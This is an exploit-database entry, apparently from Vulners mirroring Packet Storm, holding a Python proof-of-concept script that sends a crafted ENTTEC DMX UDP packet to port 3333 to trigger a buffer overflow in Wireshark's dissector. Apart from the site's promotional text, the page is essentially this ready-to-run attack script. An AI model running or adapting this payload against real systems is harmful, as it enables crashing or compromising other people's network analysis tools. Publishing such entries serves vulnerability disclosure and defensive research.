Lucene search
K

Wireshark ENTTEC DMX Data RLE Buffer Overflow

🗓️ 03 Jan 2011 00:00:00Reported by non-customersType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Wireshark ENTTEC DMX Data RLE Buffer Overflo

Code
`#!/usr/bin/env python  
  
# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC  
# by non-customers crew in 2010  
# http://rock-madrid.com/  
  
import socket, sys  
  
try:  
host = sys.argv[1]  
except:  
print "usage: " + sys.argv[0] + " <host>"  
sys.exit(2)  
  
port = 3333  
addr = (host, port)  
  
data = "ESDD\x10\x20\x04"  
data += "\x00\x0c"  
data += "\xfe\xff\x41"  
data += "\xfe\xff\x42"  
data += "\xfe\xff\x43"  
data += "\xfe\xff\x44"  
  
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  
try:  
udps.sendto(data, addr)  
except:  
print "can't lookup host"  
sys.exit(1)  
  
udps.close()  
sys.exit(0)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jan 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
21